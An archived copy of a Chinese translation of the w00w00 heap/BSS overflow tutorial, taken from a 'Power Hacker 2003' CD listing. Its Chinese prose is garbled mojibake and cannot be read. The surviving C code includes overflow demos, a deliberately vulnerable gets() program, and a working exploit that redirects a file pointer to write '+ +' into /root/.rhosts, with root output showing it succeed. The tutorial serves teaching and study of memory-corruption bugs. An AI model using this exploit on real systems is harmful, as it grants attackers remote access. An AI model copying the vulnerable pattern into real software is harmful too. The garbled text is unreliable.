Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / w00w00 / articles / heaptut-chinese.txt < prev next >

Wrap

Text File | 2002-01-24 | 33.9 KB | 1,099 lines

Heap/BSS ╥τ│÷╗·└φ╖╓╬÷ warning3<@hotmail.com> 1999.12 [╟░╤╘ú║ ] [ ╒Γ╞¬╬─╒┬╓≈╥¬╩╟╗∙╙┌w00w00╖ó▒φ╡─: ] [ w00w00 on Heap Overflows ] [By: Matt Conover & w00w00 Security Team ] [-----------------------------------------------------------------------] [Copyright (C) January 1999, Matt Conover & w00w00 Security Development ] [ ╥▓▓╣│Σ┴╦╥╗╨⌐│╠╨≥║═╫╘╝║╡─╧δ╖¿. ] [ ╖╟│ú╕╨╨╗Matt Conover╕°╙Φ╡─╚╚╟Θ░∩╓·. ] [ (Thank Matt for his great work and help) ] [ ─π┐╔╥╘┤╙╧┬├µ╡─╡╪╓╖╗±╚í╘¡╬─: ] [ http://http://www.w00w00.org/articles.html ] [ ╙╔╙┌╩▒╝Σ╜╧╜⌠ú¼╩Φ┬⌐╓«┤ª─╤├Γú¼╚╬║╬╥Γ╝√║═╜¿╥Θ╟δ╖ó╕°warning3@hotmail.com ] ╦Σ╚╗╗∙╙┌Heap(╢╤)/BSS╡─╥τ│÷╧╓╘┌╩╟╧α╡▒╞╒▒Θ╡─ú¼╡½▓ó├╗╙╨╢α╔┘╜Θ╔▄╦ⁿ╡─╫╩┴╧íú ▒╛╬─╜½░∩─π└φ╜Γ╩▓├┤╩╟Heap╥τ│÷ú¼╥▓╜Θ╔▄┴╦╝╕╓╓│ú╙├╡─╣Ñ╗≈╖╜╖¿ú¼═¼╩▒╕°│÷┴╦╥╗╨⌐┐╔ ─▄╡─╜Γ╛÷╖╜░╕íú╘─╢┴▒╛╬─ú¼─·╨Φ╥¬┴╦╜Γ╥╗╨⌐╗π▒αú¼C╙∩╤╘╥╘╝░╢╤╒╗╥τ│÷╡─╗∙▒╛╓¬╩╢íú ╥╗.╬¬╩▓├┤Heap/BSS╥τ│÷║▄╓╪╥¬ú┐ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ╢╤╒╗╥τ│÷╡─╬╩╠Γ╥╤╛¡╣π╬¬╚╦╓¬ú¼╘╜└┤╘╜╢α╡─▓┘╫≈╧╡═│╔╠╝╥╘÷╝╙┴╦▓╗┐╔╓┤╨╨╢╤╒╗╡─▓╣ ╢íú¼╥╗╨⌐╕÷╚╦╥▓╠ß╣⌐┴╦╫╘╝║╡─▓╣╢íú¼╧≤╓°├√╡─Solar Designer╠ß╣⌐╡─╒δ╢╘Linux╡─▓╗┐╔ ╓┤╨╨╢╤╒╗╡─kernel patch(─┐╟░╥╤╛¡═╞│÷┴╦╙├╙┌2.2.13─┌║╦╡─patch)ú¼╥▓╙╨╥╗╨⌐╚╦┐¬╖ó ┴╦╥╗╨⌐▒α╥δ╞≈└┤╖└╓╣╢╤╒╗╥τ│÷ú¼╧≤Crispin Cowan╡╚┐¬╖ó╡─StackGuard╡╚╡╚íú╒Γ╨⌐╖╜╖¿ ╢╝╥╗╢¿│╠╢╚╔╧┐╔╥╘╝⌡╔┘╙╔╢╤╒╗╥τ│÷╡╝╓┬╡─░▓╚½╬╩╠Γú¼╡½╩╟▓ó╚┤▓╗─▄╖└╓╣Heap/BSS╡─╥τ│÷íú ╘┌┤≤╢α╩²╡─▓┘╫≈╧╡═│╓╨ú¼Heap║═BSS╢╬╢╝╩╟┐╔╨┤┐╔╓┤╨╨╡─íú╒Γ╛═╩╣╡├Heap/BSS╡─╥τ│÷│╔ ╬¬┐╔─▄íú ┤≤▓┐╖╓╡─╗∙╙┌heap╡─╥τ│÷╢╝╩╟▓╗╥└└╡╙┌╧╡═│║═╙▓╝■╜ß╣╣╡─ú¼╒Γ╜½╘┌║≤├µ╜°╥╗▓╜╜Θ╔▄íú ╢■.╥╗╨⌐╕┼─ε ~~~~~~~~~~~ ╥╗╕÷┐╔╓┤╨╨╡─╬─╝■ú¿▒╚╚τ│ú╝√╡─ELF--Executable and Linking Format╕±╩╜╡─┐╔╓┤╨╨ ╬─╝■)═¿│ú░ⁿ║¼╢α╕÷╢╬ú¼▒╚╚τú║PLT(╣²│╠┴¼╜╙▒φú⌐ú¼GOT(╚½╛╓╞½╥╞▒φú⌐,init(░ⁿ║¼╘┌│⌡╩╝╗» ╩▒╓┤╨╨╡─╓╕┴εú⌐ú¼fini(░ⁿ║¼│╠╨≥╓╒╓╣╩▒╥¬╓┤╨╨╡─╓╕┴εú⌐ú¼╥╘╝░ctors║═dtors(░ⁿ║¼╥╗╨⌐╚½ ╛╓╣╣╘∞╓╕┴ε║═╬÷╣╣╓╕┴εú⌐ ╦∙╬╜HEAPú¼╛═╩╟╙╔╙ª╙├│╠╨≥╢»╠¼╖╓┼Σ╡──┌┤µ╟°íú╘┌╒Γ└∩ú¼"╙╔╙ª╙├│╠╨≥"└┤╖╓┼Σ╩╟╓╡╡├╠╪▒≡╫ó ╥Γ╡─ú¼╥≥╬¬╘┌╥╗╕÷║├╡─▓┘╫≈╧╡═│╓╨ú¼┤≤▓┐╖╓╡──┌┤µ╟°╩╡╝╩╔╧╩╟╘┌─┌║╦╥╗╝╢▒╗╢»╠¼╖╓┼Σ╡─ú¼╢° Heap╢╬╘≥╩╟╙╔╙ª╙├│╠╨≥└┤╖╓┼Σ╡─íú╦ⁿ╘┌▒α╥δ╡─╩▒║≥▒╗│⌡╩╝╗»íú BSS╢╬░ⁿ║¼╬┤▒╗│⌡╩╝╗»╡─╩²╛▌ú¼╘┌│╠╨≥╘╦╨╨╡─╩▒║≥▓┼▒╗╖╓┼Σíú╘┌▒╗╨┤╚δ╩²╛▌╟░ú¼╦ⁿ╩╝╓╒▒ú│╓ ╚½┴πú¿╓┴╔┘┤╙╙ª╙├│╠╨≥╡─╜╟╢╚┐┤╩╟╒Γ╤∙╡─ú⌐ ╘┌┤≤▓┐╖╓╡─╧╡═│╓╨ú¼Heap╢╬╩╟╧≥╔╧╘÷│ñ╡─ú¿╧≥╕▀╓╖╖╜╧≥╘÷│ñú⌐íú╥≥┤╦ú¼╡▒╬╥├╟╦╡"X╘┌Y╡─ ╧┬├µ"╩▒,╛═╩╟╓╕"X╡─╡╪╓╖╡═╙┌Y╡─╡╪╓╖"íú ╫ó╥Γú║╧┬├µ╠ß╡╜╡─"╗∙╙┌heap╡─╥τ│÷"╝╚░ⁿ║¼HEAP╢╬╡─╥τ│÷ú¼╥▓░ⁿ║¼BSS╢╬╡─╥τ│÷íú ╚².Heap/BSS╥τ│÷╣Ñ╗≈ ╘┌╒Γ╥╗▓┐╖╓╓╨╬╥├╟╜½╜Θ╔▄╝╕╓╓▓╗═¼╡─└√╙├Heap/BSS╥τ│÷╡─╖╜╖¿íú┤≤▓┐╖╓╡─└²╫╙╢╝╩╟╒δ╢╘ x86 Unix╧╡═│╡─íú╫÷╥╗╨⌐╩╩╡▒╡─╕─▒Σú¼╥▓┐╔╥╘╙├╙┌DOS║═Windows╧╡═│íú╬╥├╟╥▓╜Θ╔▄┴╦╝╕╓╓╫¿ ├┼╒δ╢╘DOS/Windows╡─╣Ñ╗≈╖╜╖¿íú ╫ó╥Γú║ ╘┌▒╛╬─╓╨ú¼╬¬┴╦╝≥╡Ñ╞≡╝√ú¼╬╥├╟╩╣╙├┴╦╛½╚╖╡─╞½╥╞┴┐íú╞½╥╞┴┐▒╪╨δ╙δ╩╡╝╩╡─╓╡╧α╡╚ú¼╣Ñ ╗≈│╠╨≥▓┼─▄╣ñ╫≈íú╡▒╚╗─π╥▓┐╔╥╘╧≤═¿│ú╡─╢╤╒╗╣Ñ╗≈╖╜╖¿─╟╤∙ú¼═¿╣²╠ß╣⌐╢α╕÷╖╡╗╪╡╪╓╖╝░▓σ╚δ ┐╒╓╕┴ε╡╚╖╜╖¿╥╘╘÷╝╙│╔╣ª╡─╗·┬╩íú ╧┬├µ╡─╒Γ╕÷└²╫╙╩╟╕°─╟╨⌐▓╗╩∞╧ñHeap╥τ│÷╡─╚╦┐┤╡─ú¼╬╥╗ß╫÷╥╗╨⌐╝≥╡Ñ╡─╜Γ╩═ú║ ----------------------------------------------------------------------------- /* ╤▌╩╛╘┌heap╢╬(╥╤│⌡╩╝╗»╡─╩²╛▌)╖ó╔·╡─╢»╠¼╗║│σ╟°╥τ│÷ */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 16 #define OVERSIZE 8 /* ╬╥├╟╜½╕▓╕╟buf2╡─╟░OVERSIZE╕÷╫╓╜┌ */ int main() { u_long diff; char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); diff = (u_long)buf2 - (u_long)buf1; printf("buf1 = %p, buf2 = %p, diff = 0x%x (%d)bytes\n", buf1, buf2, diff, diff); memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';/* ╜½buf2╙├'A'╠ε│Σ */ printf("before overflow: buf2 = %s\n", buf2); memset(buf1, 'B', (u_int)(diff + OVERSIZE)); /* ╙├diff+OVERSIZE╕÷'B'╠ε│Σbuf1 */ printf("after overflow: buf2 = %s\n", buf2); return 0; } ----------------------------------------------------------------------------- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║ [warning3@testserver basic]$ ./heap1 8 buf1 = 0x8049858, buf2 = 0x8049870, diff = 0x18 (24)bytes before overflow: buf2 = AAAAAAAAAAAAAAA after overflow: buf2 = BBBBBBBBAAAAAAA ╬╥├╟┐┤╡╜buf2╡─╟░8╕÷╫╓╜┌▒╗╕▓╕╟┴╦íú╒Γ╩╟╥≥╬¬═∙buf1╓╨╠ε╨┤╡─╩²╛▌│¼│÷┴╦╦ⁿ╡─▒▀╜τ╜°╚δ┴╦ buf2╡─╖╢╬ºíú╙╔╙┌buf2╡─╩²╛▌╚╘╚╗╘┌╙╨╨º╡─heap╟°─┌ú¼│╠╨≥╚╘╚╗┐╔╥╘╒²│ú╜ß╩°íú┴φ═Γ╬╥├╟ ┐╔╥╘╫ó╥Γ╡╜ú¼╦Σ╚╗buf1║═buf2╩╟╧α╝╠╖╓┼Σ╡─ú¼╡½╦√├╟▓ó▓╗╩╟╜⌠░ñ╫┼╡─ú¼╢°╩╟╙╨8╕÷╫╓╜┌╡─╝Σ ╛αú¼╒Γ╕÷╝Σ╛α┐╔─▄╦µ▓╗═¼╡─╧╡═│╗╖╛│╢°▓╗═¼íú buf1 ╝Σ╛α buf2 ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][xxxxxxxx][AAAAAAAAAAAAAAA] ╡═╓╖ -----------------------------------> ╕▀╓╖ ╕▓╕╟║≤:[BBBBBBBBBBBBBBBB][BBBBBBBB][BBBBBBBBAAAAAAA] ╫ó╥Γú║ ╥╗╕÷╫Φ╓╣heap╥τ│÷╡─┐╔─▄╡─╖╜╖¿╛═╩╟╘┌heap╢╬╡─╦∙╙╨▒Σ┴┐╓«╝Σ╖┼╥╗╕÷"canary"╓╡(╛═╧≤ StackGuard╓╨╦∙╫÷╡──╟╤∙ú⌐,╚⌠╒Γ╕÷╓╡╘┌╓┤╨╨╓╨▒╗╕─▒Σú¼╛═╚╧╬¬╖ó╔·┴╦╥τ│÷íú ╬¬┴╦╜Γ╩═BSS╢╬╡─╥τ│÷ú¼╬╥├╟└┤┐┤╧┬├µ╒Γ╕÷└²╫╙ú║ ----------------------------------------------------------------------------- /* ╤▌╩╛╘┌BSS╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌)╡─╛▓╠¼╗║│σ╟°╥τ│÷ */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define ERROR -1 #define BUFSIZE 16 int main(int argc, char **argv) { u_long diff; int oversize; static char buf1[BUFSIZE], buf2[BUFSIZE]; if (argc <= 1) { fprintf(stderr, "Usage: %s <numbytes>\n", argv[0]); fprintf(stderr, "[Will overflow static buffer by <numbytes>]\n"); exit(ERROR); } diff = (u_long)buf2 - (u_long)buf1; printf("buf1 = %p, buf2 = %p, diff = 0x%x (%d) bytes\n\n", buf1, buf2, diff, diff); memset(buf2, 'A', BUFSIZE - 1), memset(buf1, 'B', BUFSIZE - 1); buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0'; printf("before overflow: buf1 = %s, buf2 = %s\n", buf1, buf2); oversize = diff + atoi(argv[1]); memset(buf1, 'B', oversize); buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0'; printf("after overflow: buf1 = %s, buf2 = %s\n\n", buf1, buf2); return 0; } ----------------------------------------------------------------------------- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║ [warning3@testserver basic]$ ./heap2 8 buf1 = 0x8049874, buf2 = 0x8049884, diff = 0x10 (16) bytes before overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = AAAAAAAAAAAAAAA after overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = BBBBBBBBAAAAAAA ║═heap╥τ│÷└α╦╞ú¼buf2╡─╟░8╕÷╫╓╜┌╥▓▒╗╕▓╕╟┴╦íú╬╥├╟╥▓┐╔╥╘╫ó╥Γ╡╜ú¼buf1║═buf2╩╟╜⌠░ñ╫┼ ╡─ú¼╒Γ╥Γ╬╢╫┼╬╥├╟┐╔╥╘▓╗╙├▓┬▓Γbuf1║═buf2╓«╝Σ╡─╝Σ╛α. buf1 buf2 ╕▓╕╟╟░:[BBBBBBBBBBBBBBBB][AAAAAAAAAAAAAAA] ╡═╓╖ ----------------------> ╕▀╓╖ ╕▓╕╟║≤:[BBBBBBBBBBBBBBBB][BBBBBBBBAAAAAAA] ┤╙╔╧├µ┴╜╕÷╝≥╡Ñ╡─└²╫╙ú¼╬╥├╟┐╔╥╘╙ª╕├╥╤╛¡┴╦╜ΓHeap/BSS╥τ│÷╡─╗∙▒╛╖╜╩╜┴╦íú╬╥├╟─▄╙├╦ⁿ └┤╕▓╕╟╥╗╕÷╬─╝■├√ú¼┐┌┴ε╗≥╒▀╩╟▒ú┤µ╡─uid╡╚╡╚... ╧┬├µ╒Γ╕÷└²╫╙╤▌╩╛┴╦╥╗╕÷╓╕╒δ╩╟╚τ║╬▒╗╕▓╕╟╡─: ----------------------------------------------------------------------------- /* ╤▌╩╛╘┌BSS╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌)╓╨╡─╛▓╠¼╓╕╒δ╥τ│÷ */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define BUFSIZE 16 #define ADDRLEN 4 /* ╓╕╒δ╡╪╓╖╡─│ñ╢╚ */ int main() { u_long diff; static char buf[BUFSIZE], *bufptr; bufptr = buf, diff = (u_long)&bufptr - (u_long)buf; printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); memset(buf, 'A', (u_int)(diff + ADDRLEN));/* ╜½diff+ADDRLEN╫╓╜┌╡─'A'╠ε│Σ╡╜buf╓╨ */ printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); return 0; } ----------------------------------------------------------------------------- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║ [warning3@testserver basic]$ ./heap3 bufptr (0x8049640) = 0x8049630, buf = 0x8049630, diff = 0x10 (16) bytes bufptr (0x8049640) = 0x41414141, buf = 0x8049630, diff = 0x10 (16) bytes buf bufptr ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][0x08049630] ╡═╓╖ ------------------> ╕▀╓╖ ╕▓╕╟║≤:[AAAAAAAAAAAAAAAA][0x41414141] [AAAA] ╬╥├╟┐╔╥╘║▄╟σ│■╡─┐┤╡╜ú¼╧╓╘┌╓╕╒δbufptr╧╓╘┌╓╕╧≥╥╗╕÷▓╗═¼╡─╡╪╓╖(0x41414141). ╚τ║╬└√╙├╒Γ╥╗╡π─╪ú┐└²╚τ╬╥├╟┐╔╥╘╓╪╨┤╥╗╕÷┴┘╩▒╬─╝■├√╡─╓╕╒δú¼╩╣╞Σ╓╕╧≥╥╗╕÷▓╗═¼╡─╫╓╖√ ┤«(▒╚╚τ argv[1]╗≥╩╟╙╔╬╥├╟╠ß╣⌐╡──│╕÷╗╖╛│▒Σ┴┐),╦ⁿ┐╔╥╘░ⁿ║¼"/root/.rhosts"╗≥"/etc/ passwd".... ╬¬┴╦╦╡├≈╒Γ╥╗╡πú¼╬╥├╟╘┘└┤┐┤╥╗╕÷└²╫╙íú╒Γ╕÷│╠╨≥╗ß╙├╥╗╕÷┴┘╩▒╬─╝■└┤┤ó┤µ╙├╗º╩Σ╚δ╡─ ╩²╛▌íú ----------------------------------------------------------------------------- /* * ╒Γ╩╟╥╗╕÷║▄╡Σ╨═╡─╙╨╚⌡╡π╡─│╠╨≥íú╦ⁿ╜½╙├╗º╡─╔ε╚δ┤ó┤µ╘┌╥╗╕÷┴┘╩▒╬─╝■╓╨íú * * * ▒α╥δ╖╜╖¿: gcc -o vulprog1 vulprog1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define ERROR -1 #define BUFSIZE 16 /* * ╜½╣Ñ╗≈│╠╨≥╥╘root╔φ╖▌╘╦╨╨╗≥╒▀╕─▒Σ╣Ñ╗≈│╠╨≥╓╨"vulfile"╡─╓╡íú * ╖±╘≥ú¼╝┤╩╣╣Ñ╗≈│╠╨≥│╔╣ªú¼╦ⁿ╥▓▓╗╗ß╙╨╚¿╧▐╨▐╕─/root/.rhosts(╚▒╩í╡─└²╫╙) * */ int main(int argc, char **argv) { FILE *tmpfd; static char buf[BUFSIZE], *tmpfile; if (argc <= 1) { fprintf(stderr, "Usage: %s <garbage>\n", argv[0]); exit(ERROR); } tmpfile = "/tmp/vulprog.tmp"; /* ╒Γ└∩╘▌╩▒▓╗┐╝┬╟┴┤╜╙╬╩╠Γ :) */ printf("before: tmpfile = %s\n", tmpfile); printf("Enter one line of data to put in %s: ", tmpfile); gets(buf); /* ╡╝╓┬buf╥τ│÷ */ printf("\nafter: tmpfile = %s\n", tmpfile); tmpfd = fopen(tmpfile, "w"); if (tmpfd == NULL) { fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno)); exit(ERROR); } fputs(buf, tmpfd); /* ╜½buf╠ß╣⌐╡─╩²╛▌┤µ╚δ┴┘╩▒╬─╝■ */ fclose(tmpfd); } ----------------------------------------------------------------------------- ╒Γ╕÷└²╫╙╓╨╡─╟Θ╨╬╘┌▒α│╠╩▒╩╟║▄╚▌╥╫╖ó╔·╡─ú¼║▄╢α╚╦╥╘╬¬╙├╛▓╠¼╩²╫Θ║═╛▓╠¼╓╕╒δ╛═╗ß▒╚╜╧ ░▓╚½ú¼┐┤┴╦╧┬├µ╡─╣Ñ╗≈│╠╨≥ú¼╬╥╧δ─π╛═▓╗╗ß╒Γ├┤╧δ┴╦.:-) ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * ╒Γ╕÷│╠╨≥╜½╙├└┤╣Ñ╗≈vulprog1.c.╦ⁿ┤½╩Σ▓╬╩²╕°╙╨╚⌡╡π╡─│╠╨≥íú╙╨╚⌡╡π╡─│╠╨≥ * ╥╘╬¬╜½╬╥├╟╩Σ╚δ╡─╥╗╨╨╩²╛▌┤ó┤µ╡╜┴╦╥╗╕÷┴┘╩▒╬─╝■└∩íú╚╗╢°ú¼╥≥╬¬╖ó╔·┴╦╛▓╠¼ * ╗║│σ╟°╥τ│÷╡─╘╡╣╩ú¼╬╥├╟┐╔╥╘╨▐╕─╒Γ╕÷┴┘╩▒╬─╝■╡─╓╕╒δú¼╚├╦ⁿ╓╕╧≥argv[1](╬╥├╟ * ╜½┤½╡▌"/root/.rhosts"╕°╦ⁿú⌐íú╚╗║≤│╠╨≥╛═╗ß╜½╬╥├╟╠ß╣⌐╡─╩Σ╚δ╩²╛▌┤µ╘┌"/root * /.rhosts"╓╨íú╦∙╥╘╬╥├╟╙├└┤╕▓╕╟╗║│σ╟°╡─╫╓╖√┤«╜½╗ß╩╟╧┬├µ╡─╕±╩╜ú║ * [+ + # ][(tmpfile╡╪╓╖) - (buf ╡╪╓╖)╕÷╫╓╖√'A'][argv[1]╡─╡╪╓╖] * * "+ +"║≤├µ╕·╫┼'#'║┼╩╟╬¬┴╦╖└╓╣╬╥├╟╡─╥τ│÷┤·┬δ│÷╬╩╠Γíú├╗╙╨'#'(╫ó╩═╖√),╩╣╙├ * .rhosts╡─│╠╨≥╛═╗ß┤φ╬≤╜Γ╩═╬╥├╟╡─╥τ│÷┤·┬δíú * * ▒α╥δ╖╜╖¿: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 256 #define DIFF 16 /* vulprog╓╨buf║═tmpfile╓«╝Σ╡─╝Σ╛α */ #define VULPROG "./vulprog1" #define VULFILE "/root/.rhosts" /* buf ╓╨╡──┌╚▌╜½▒╗┤ó┤µ╘┌╒Γ╕÷╬─╝■╓╨ */ /* ╡├╡╜╡▒╟░╢╤╒╗╡─espú¼╙├└┤╝╞╦πargv[1]╡─╡╪╓╖ */ u_long getesp() { __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */ } int main(int argc, char **argv) { u_long addr; register int i; int mainbufsize; char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; /* ------------------------------------------------------ */ if (argc <= 1) { fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]); exit(ERROR); } /* ------------------------------------------------------ */ memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); /* ╜½╣Ñ╗≈┤·┬δ╠ε╚δbuf */ memset(buf + strlen(buf), 'A', DIFF); /* ╙├'A'╠ε┬·╩ú╙α╡─buf┐╒╝Σ */ addr = getesp() + atoi(argv[1]); /* ╝╞╦πargv[1]╡─╡╪╓╖ */ /* ╜½╡╪╓╖╖┤╨≥┼┼┴╨(╘┌╨íendian╧╡═│╓╨)║≤┤µ╚δbuf+DIFF┤ª */ for (i = 0; i < sizeof(u_long); i++) buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255); /* ╝╞╦πmainbuf╡─│ñ╢╚ */ mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13; mainbuf = (char *)malloc(mainbufsize); memset(mainbuf, 0, sizeof(mainbuf)); snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", buf, VULPROG, VULFILE); printf("Overflowing tmpaddr to point to %p, check %s after.\n\n", addr, VULFILE); system(mainbuf); return 0; } ----------------------------------------------------------------------------- [root@testserver vulpkg1]# ./exploit1 349 Overflowing tmpaddr to point to 0xbffffe6d, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /vulprog1 ╬╥├╟┐┤╡╜╧╓╘┌tmpfile╓╕╧≥argv[0]("./vulprog1"), ╬╥├╟╘÷╝╙10╕÷╫╓╜┌(argv[0]╡─│ñ╢╚): [root@testserver vulpkg1]# ./exploit1 359 Overflowing tmpaddr to point to 0xbffffe77, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /root/.rhosts [root@testserver vulpkg1]# cat /root/.rhosts + + # AAAAAAAAAAw?┐AA buf tmpfile ╕▓╕╟║≤ú║[+ +\t# AAAAAAAAAA][0x123445678] ╬╥├╟╥╤╛¡│╔╣ª╡─╜½"+ +"╠φ╝╙╡╜┴╦/root/.rhosts╓╨úí╣Ñ╗≈│╠╨≥╕▓╕╟┴╦vulprog╙├└┤╜╙╩▄ gets()╩Σ╚δ╡─╛▓╠¼╗║│σ╟°ú¼▓ó╜½▓┬▓Γ╡─argv[1]╡─╡╪╓╖╕▓╕╟tmpfile.╬╥├╟┐╔╥╘╘┌mainbuf╓╨ ╖┼╓├╚╬╥Γ│ñ╢╚╡─'A'╓▒╡╜╖ó╧╓╢α╔┘╕÷'A'▓┼─▄╡╜┤∩tmpfile╡─╡╪╓╖íú╚τ╣√─π╙╨╚⌡╡π│╠╨≥╘┤┬δ╡─ ╗░ú¼┐╔╥╘╘÷╝╙"printf()"└┤╧╘╩╛│÷▒╗╕▓╕╟╡─╩²╛▌╙δ─┐▒Ω╩²╛▌╓«╝Σ╡─╛α└δú¿▒╚╚τú║ 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)'). ╡½═¿│ú╒Γ╕÷╞½╥╞┴┐╘┌▒α╥δ╡─╩▒║≥╗ß╖ó╔·╕─▒Σú¼╡½╬╥├╟┐╔╥╘║▄╚▌╥╫╡─╓╪╨┬╝╞╦π/▓┬▓Γ╔⌡╓┴ "▒⌐┴ª"▓┬▓Γ╒Γ╕÷╞½╥╞┴┐. ╫ó╥Γú║ ╬╥├╟╨Φ╥¬╥╗╕÷╙╨╨º╡─╡╪╓╖(argv[1]╡─╡╪╓╖),╬╥├╟▒╪╨δ╜½╫╓╜┌╦│╨≥╖┤╧≥(╘┌little endian ╧╡═│╓╨).Little endian╧╡═│═¿│ú╩╟╡═╫╓╜┌╘┌╟░(x86╛═╩╟little endian╧╡═│). ╥≥┤╦0x12345678╘┌─┌┤µ╓╨╛═╩╟░┤0x78563412╡─╦│╨≥┤µ╖┼íú╚τ╣√╬╥├╟╩╟╘┌big endian╧╡═│ ╓╨╫÷╒Γ╨⌐ú¿▒╚╚τsparc)ú¼╬╥├╟╛═▓╗▒╪╫÷╖┤╨≥╡─┤ª└φ┴╦íú ╞∙╜±╬¬╓╣ú¼╒Γ╨⌐└²╫╙╓╨├╗╙╨╥╗╕÷╥¬╟≤┐╔╓┤╨╨╡─heap!╒Γ╨⌐└²╫╙╢╝╩╟▓╗╥└└╡╧╡═│║═╙▓╝■ ╜ß╣╣╡─(│²┴╦╫╓╜┌╖┤╨≥╡─▓┐╖╓)íú╒Γ╘┌╣Ñ╗≈heap╥τ│÷╩▒╩╟╖╟│ú╙╨╙├╡─íú ╓¬╡└┴╦╘⌡├┤╓╪╨┤╥╗╕÷╓╕╒δú¼╬╥├╟╜╙╧┬└┤┐┤┐┤╚τ║╬╨▐╕─╥╗╕÷║»╩²╓╕╒δíú╙δ╔╧├µ╡─└²╫╙▓╗═¼╡─╩╟ú¼ ╨▐╕─║»╩²╓╕╒δ╡─╣Ñ╗≈╥¬╟≤╙╨╥╗╕÷┐╔╥╘╓┤╨╨╡─Heap ║»╩²╓╕╒δ(▒╚╚τ "int (*funcptr)(char *str)")╘╩╨φ│╠╨≥╘▒╢»╠¼╨▐╕─╥¬▒╗╡≈╙├╡─║»╩²íú╬╥├╟ ┐╔╥╘╓╪╨┤║»╩²╓╕╒δ╡─╡╪╓╖ú¼╩╣╞Σ▒╗╓┤╨╨╡─╩▒║≥╫¬╚Ñ╡≈╙├╬╥├╟╓╕╢¿╡─║»╩²ú¿┤·┬δú⌐íú╬¬┴╦┤∩╡╜ ╒Γ╕÷─┐╡─ú¼╬╥├╟╙╨╢α╓╓╤í╘±íú ╩╫╧╚ú¼╬╥├╟┐╔╥╘╩╣╙├╫╘╝║╡─shellcode,╬╥├╟┐╔╥╘╙├┴╜╓╓╖╜╖¿└┤╩╣╙├╬╥├╟╡─shellcodeú║ 1. argv[]╖╜╖¿ ú║ ╜½shellcode┤ó┤µ╘┌╥╗╕÷│╠╨≥▓╬╩²╓╨ú¿╒Γ╥¬╟≤╥╗╕÷┐╔╓┤╨╨╡─╢╤╒╗) 2. heap╞½╥╞╖╜╖¿ú║╜½shellcode┤ó┤µ╘┌┤╙heap╡─╢Ñ╢╦╡╜▒╗╕▓╕╟╡─╓╕╒δ╓«╝Σ╡─╟°╙≥╓╨ ú¿╒Γ╥¬╟≤┐╔╓┤╨╨╡─heap) ╫ó╥Γú║ heap┐╔╓┤╨╨╡─┐╔─▄╨╘▒╚╢╤╒╗┐╔╓┤╨╨╡─┐╔─▄╨╘╥¬┤≤╡├╢αíú╥≥┤╦ú¼└√╙├heap╡─╖╜╖¿┐╔─▄╕ⁿ │ú╙├╥╗╨⌐íú ┴φ═Γ╡─╥╗╓╓╖╜╖¿╩╟╝≥╡Ñ╡╪▓┬▓Γ╥╗╕÷║»╩²ú¿▒╚╚τsystem())╡─╡╪╓╖íú╚τ╣√╬╥├╟╓¬╡└╣Ñ╗≈│╠╨≥╓╨ system()╡─╡╪╓╖ú¼─╟├┤▒╗╣Ñ╗≈╡─│╠╨≥╓╨system()╡─╡╪╓╖╙ª╕├╙δ╞Σ╧α▓ε▓╗╘▒ú¼╝┘╔Φ┴╜╕÷│╠╨≥ ╘┌═¼╤∙╡─╟Θ┐÷╧┬▒α╥δ╡─╗░íú╒Γ╓╓╖╜╖¿╡─║├┤ª╘┌╙┌╦ⁿ▓╗╨Φ╥¬╥╗╕÷┐╔╓┤╨╨╡─heapíú (┴φ═Γ╥╗╓╓╖╜╖¿╩╟╩╣╙├PLT(╣²│╠┴┤╜╙▒φú⌐ú¼╒Γ└∩╛═▓╗╘┘╧Ω╩÷┴╦ú¼╙╨╨╦╚ñ╡─┐╔╥╘┐┤stranJer╫÷ ╡─╚╞╣²▓╗┐╔╓┤╨╨╢╤╒╗╡─╣Ñ╗≈ú⌐ 